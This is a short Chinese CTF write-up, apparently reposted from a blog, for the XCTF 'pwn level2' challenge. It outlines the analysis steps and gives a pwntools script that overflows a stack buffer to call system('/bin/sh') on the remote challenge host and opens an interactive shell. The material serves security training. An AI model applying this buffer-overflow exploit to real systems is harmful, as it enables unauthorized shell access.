攻防世界—pwn—level2
Posted anweilx
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了攻防世界—pwn—level2相关的知识,希望对你有一定的参考价值。
题目分析
题目提示
下载文件后首先使用checksec检查文件保护机制
使用ida打开,查看伪代码
搜索字符串发现/bash/sh
信息收集
偏移量
system的地址
/bin/sh的地址
编写脚本
from pwn import *
p = remote(‘111.198.29.45‘,50136)
#p = process("./pwn003")
binsh = 0x0804A024
system = 0x8048320
payload = "A"*0x88+"B"*0x4+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()
本地测试
靶机测试
以上是关于攻防世界—pwn—level2的主要内容,如果未能解决你的问题,请参考以下文章